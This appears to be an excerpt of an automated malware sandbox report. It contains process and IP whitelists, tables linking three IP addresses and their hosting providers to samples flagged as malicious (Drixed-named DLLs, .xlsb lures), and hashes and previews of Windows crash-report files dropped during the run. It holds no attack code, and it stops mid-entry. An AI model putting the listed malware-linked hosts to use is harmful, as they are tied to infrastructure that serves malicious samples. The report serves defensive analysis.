Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 67.27.235.254, 67.27.158.254, 67.27.233.254, 67.27.158.126, 8.248.131.254, 20.50.102.62, 20.190.159.138, 40.126.31.141, 40.126.31.143, 20.190.159.132, 40.126.31.6, 40.126.31.137, 40.126.31.8, 40.126.31.139, 52.168.117.173, 52.182.143.212, 104.208.16.94 Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fg.download.windowsupdate.com.c.footprint.net, wu-shim.trafficmanager.net, www.tm.lg.prod.aadmsa.akadns.net, ctldl.windowsupdate.com, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, login.msa.msidentity.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
66.147.235.11	SecuriteInfo.com.Drixed-FJX22779BFC1D68.14546.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse
149.202.179.100	SecuriteInfo.com.Drixed-FJX22779BFC1D68.14546.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse
81.0.236.89	SecuriteInfo.com.Drixed-FJX22779BFC1D68.14546.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HOSTROCKETUS	SecuriteInfo.com.Drixed-FJX22779BFC1D68.14546.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse	66.147.235.11
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse	66.147.235.11
	ckrgvIQvmUux.dll	Get hash	malicious	Browse	66.147.235.11
	ckrgvIQvmUux.dll	Get hash	malicious	Browse	66.147.235.11
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse	66.147.235.11
	s1uOMLvpO4.exe	Get hash	malicious	Browse	216.120.236.127
	WGs54P9e8a	Get hash	malicious	Browse	216.120.241.108
	ba2Eq178BGXyW5T.exe	Get hash	malicious	Browse	216.120.237.68
	4TXvMuUjTxE2kqz.exe	Get hash	malicious	Browse	66.147.239.119
	Requirements-oct_2020.exe	Get hash	malicious	Browse	66.147.239.119
	JESEE FRIED FIRDAY.exe	Get hash	malicious	Browse	66.147.239.119
OVHFR	SecuriteInfo.com.Drixed-FJX22779BFC1D68.14546.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse	149.202.179.100
	protocol-1096018033.xls	Get hash	malicious	Browse	192.99.46.215
	protocol-1096018033.xls	Get hash	malicious	Browse	192.99.46.215
	arm7	Get hash	malicious	Browse	8.33.207.78
	#U0191ACTU#U0156A_wfpqacDkwlb__Z2676679.vbs	Get hash	malicious	Browse	144.217.33.249
	Byov62cXa1.exe	Get hash	malicious	Browse	94.23.24.82
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse	149.202.179.100
	ckrgvIQvmUux.dll	Get hash	malicious	Browse	149.202.179.100
	ckrgvIQvmUux.dll	Get hash	malicious	Browse	149.202.179.100
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse	149.202.179.100
	lyVSOhLA7o.dll	Get hash	malicious	Browse	51.210.102.137

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_2d53275b1be4ca5e6593e323a54ecdeda8efe761_82810a17_15a172f5\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9140610265091967
Encrypted:	false
SSDEEP:	192:yyi80oX6HBUZMX4jed+z/u7sfS274ItWc:HiaXSBUZMX4je+/u7sfX4ItWc
MD5:	578308542CFF74025D18BA29948DD74B
SHA1:	A84361FD63C6FD29AB2DAE72F7DBD20C8624DF14
SHA-256:	D9D391B23E0675EB99EFFD0963522FC3704D1FC2DBAE1D74DD2F510AEFDB6637
SHA-512:	AE57C7C80D5878FD0127BC47A35183E81DE26DE443132949EB0D68E945813D0130A4A0C72757270139DB582E75C4D64DC4D165C99C623160B23E964CD38574D7
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.9.8.9.7.0.7.4.4.5.5.9.0.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.9.8.9.7.0.8.9.8.6.2.0.7.3.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.3.4.f.0.0.0.-.9.2.b.1.-.4.c.7.7.-.b.4.f.a.-.9.a.a.3.e.8.c.a.2.0.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.5.a.4.2.9.0.-.f.8.3.f.-.4.c.e.d.-.9.5.0.0.-.3.0.5.5.1.b.8.b.7.a.2.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.7.0.-.0.0.0.1.-.0.0.1.c.-.5.e.e.f.-.5.5.9.d.f.5.c.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_4eea1987c3498f452f209a432782d7d6bd992397_82810a17_1259968a\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9164027719636145
Encrypted:	false
SSDEEP:	192:LSi40oX/HBUZMX4jed+z/u7sES274ItWc:2i+X/BUZMX4je+/u7sEX4ItWc
MD5:	0CECBA5DE8275CBFC21886A6EA1712B2
SHA1:	3F021FD464047D4674988A545F270B7DF2EABA39
SHA-256:	CED54CC38A6B5392AC7108A930B63CC0D077FD529AA284AD9BD95C520E0DB829
SHA-512:	17E0497AF58B70E5A8592116645A6484EF8BA8502D07FF5D9132652639BFA6A495B1D5E377B4A19F3358BE48EC381A851A160D0115448C474E55A78379B516EA
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.9.8.9.7.0.8.6.5.7.3.9.5.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.9.8.9.7.0.9.9.7.7.7.0.1.9.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.a.2.3.4.7.a.-.f.d.d.5.-.4.a.4.a.-.b.d.3.c.-.6.6.c.9.e.e.4.8.c.b.d.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.0.b.1.f.1.5.c.-.3.a.b.e.-.4.4.e.6.-.8.7.7.2.-.1.f.e.5.9.7.1.c.6.5.5.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.7.8.-.0.0.0.1.-.0.0.1.c.-.c.6.f.b.-.8.4.9.d.f.5.c.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_86cc7caaf91494aa6af1cec8da5ba37782e9_82810a17_1811a30d\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9163549584990345
Encrypted:	false
SSDEEP:	192:o9liE0oXhHBUZMX4jed+z/u7sES274ItWc:giyXxBUZMX4je+/u7sEX4ItWc
MD5:	92FF5D41081D17BEBC3CFD94F9416872
SHA1:	09CEF1AAB65B50DDD539F6D9C3E8EC28F1495458
SHA-256:	435D2B7674BB1372AB5FD3621728D4A8AA926F9C827B25B610BFFDAA6939D238
SHA-512:	21104F8F6C44379ED191542B389B7C061192AB299787B4D4A7DAE2AB54961D7C93B4060C00E7D1A092BE4D21A6A6981B3E3556BB9F4C74FE9CDA8340657FD6F8
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.9.8.9.7.0.8.8.8.3.7.7.1.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.9.8.9.7.1.0.0.4.7.8.3.0.3.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.e.f.c.6.c.9.d.-.a.0.0.1.-.4.3.c.6.-.a.7.6.c.-.c.4.0.2.f.0.6.3.f.e.8.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.2.e.2.1.b.b.1.-.c.6.f.a.-.4.d.f.f.-.8.8.a.f.-.5.9.2.c.3.a.9.1.3.e.d.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.9.8.-.0.0.0.1.-.0.0.1.c.-.7.b.7.c.-.f.c.9.d.f.5.c.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_e9d070cbac24d3d3fafff9232a9e7f59cde72c2_82810a17_0d31a2af\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9168934363039568
Encrypted:	false
SSDEEP:	192:Z+MiW0oXwHBUZMX4jed+z/u7sES274ItWc:piQXYBUZMX4je+/u7sEX4ItWc
MD5:	C853E9F6E9151D536844FA09C6F06ED7
SHA1:	B9FF0441C6BD6695BB35B9E0CE1E43DB314E0D62
SHA-256:	530E6EBC0BE0BD69F58C04D0705BAD872C0E6CB6935A20173A9AE5E33D6A2BAB
SHA-512:	9BA4BD93BC5BCD2C8025DB375E8D82347119B04CE297BAB4B80C6BE1CBC13313D204ECE66092D51879F73788C8D294FEE55709EFA87643341040A45C0A66C4F5
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.9.8.9.7.0.8.7.1.8.5.3.1.3.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.9.8.9.7.0.9.9.9.9.7.7.5.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.5.2.2.e.3.f.3.-.9.4.0.2.-.4.5.5.0.-.b.6.5.a.-.f.9.1.7.f.8.5.6.3.6.b.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.c.b.8.3.4.8.-.0.2.6.9.-.4.d.d.d.-.8.c.7.7.-.f.1.9.1.f.5.9.f.1.e.2.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.5.8.-.0.0.0.1.-.0.0.1.c.-.1.3.d.4.-.c.3.9.d.f.5.c.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2988.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Oct 28 12:17:57 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	38304
Entropy (8bit):	2.33186675708019
Encrypted:	false
SSDEEP:	192:x/HDw8vZjmHq3xByO5SkbPd6iZ/jzWyDvJGSTakU+W/3:hhHN5LbH1jz9DvJlak8
MD5:	0C6446CD7314BCE39CAFF7E07F705974
SHA1:	42B562C283A3DCBCCDD51D4189E8E943E96E7BF1
SHA-256:	7651F87690CA9C55340A89C07D523A7C4D1BE8ECF29D59D79241DC6B98B3B3AF
SHA-512:	4D258F905B263FDE57BC4E6E0465694DF91615C52E31B11D0F945BFC96561055CE54838A5DE61163964F988888AF4A6ECB084E38007B23FFFE66CA1B9AE994FE
Malicious:	false
Preview:	MDMP....... .........za............d...............l............*..........T.......8...........T................z...........................................................................................U...........B..............GenuineIntelW...........T.......p.....za.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A52.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8350
Entropy (8bit):	3.6970070970643776
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiqe6F6YYrk6ppgmfTDSZXECprB89b248sfZ0Om:RrlsNib6F6YH6ppgmfTDS8xPfI
MD5:	7B3D672F40F4C181D8E4B900C5FA5EB9
SHA1:	1947A8561DE745A0D9715971C39598E5D4A4331A
SHA-256:	DA9A98555A99704089482C6BE68BFBC9420103235E63802ADFC608F9CB21378C
SHA-512:	7F6832C6028B00832E7D730D241CF4B548A8CFBFC884ED8B3FB8CAD6F4A22C5EE1E4991CEC1FE19462E7667965005892E47D901482864C47A1D1AE93C5AC5665
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.5.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F06.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4696
Entropy (8bit):	4.502235591625177
Encrypted:	false
SSDEEP:	48:cvIwSD8zs7+JgtWI9SkrWSC8B+8fm8M4JCdsmIFMq0k+q8/1DJ4SrSSd:uITf701FSNZJ01MEVDWSd
MD5:	BA65FDD0C2C517B931D1E47ECAFBFAE8
SHA1:	947CDC89286B8C5C86D3BD974E0E20CCDA818944
SHA-256:	7484C0BA66E226962F8F351B547980000396151BD5E0DA8AE4CF2E07690CE35D
SHA-512:	F247CDA921C4EF94D8321F3A1925044D0F7C6427E4D8D02585A951C22180A6B9B63085F6F6A555536B9896E3EEA4460FEBA16DA99F78712C2A26849AF4B57CB3
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1229608" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5897.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Oct 28 12:18:11 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	45744
Entropy (8bit):	2.0758438400580133
Encrypted:	false
SSDEEP:	96:5h8QB88/qjKsApTqbVXG/oi75SkNnus95gEPWlAhgFedON5P1URlRgWInWIXd8IY:cQN+zApqzO5SkbPdONB1UBpfHc4uh
MD5:	CA0A2D2967E6849F08BED8BC52938CEA
SHA1:	83E08A274FCF2F940A966BF01DEE2B41A0824F20
SHA-256:	84FB5C381DD37BC2BBD6DC4031EBC7F10A8CAEF98A5027757BE85D14E167932E
SHA-512:	5503A49CE3B65D0DE864693B1D7685C3974A0A284EE2A6C0EA267D887B420BDF4146E57CA7CF34A113B1BE88F4EF0F00D9B44344B965EA4EB3D0C55037D50B4F
Malicious:	false
Preview:	MDMP....... .........za........................................*-..........T.......8...........T...........................0................................................................................U...........B..............GenuineIntelW...........T.......x.....za.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5AF8.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Oct 28 12:18:12 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	44984
Entropy (8bit):	2.132776344933645
Encrypted:	false
SSDEEP:	192:DQvtDzApZoy6O5SkbPJOJ804IMTKdV1hbC3Kg6H9ujtkMks:kVFyF5Lb6hTMTKph23P6H98j/
MD5:	284EF73EC946D91A1D66B5A66E7E2597
SHA1:	6DBBB2155A4E195D1CACEC127F951DF8653BF6E0
SHA-256:	37C437EB8E448CE989F938C604B50CA6BA1DB628D5F74135A9BF410A273AA82E
SHA-512:	EC4DA4BFB8A6E3ECA6155C047526992C822FA64DD876911664C19E970506963AF9F34B9670B42F0284D5019A14743002931CE7B21104676EB60AF4B0236AA0E0
Malicious:	false
Preview:	MDMP....... .........za........................................*-..........T.......8...........T...........................0................................................................................U...........B..............GenuineIntelW...........T.......X.....za.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6170.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Oct 28 12:18:14 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	38504
Entropy (8bit):	2.2768482036605207
Encrypted:	false
SSDEEP:	192:t9k58vZjmHq3sB7SdO5SkbPd7IYqHiH+tmk0SnJA6lu8NQ8TZ7ugP:kOhHgb5LbF7IYqCNkHbA8NHug
MD5:	42B6B2C1003C52A64C49BBC9899A0389
SHA1:	07EE4EEDC32042C1A2B65A213BFF0C775F87DBF4
SHA-256:	872CBDA9AA966397C8EF26A62E9FE50E90D7DBEAA3F2049F4C7783F857B45E48
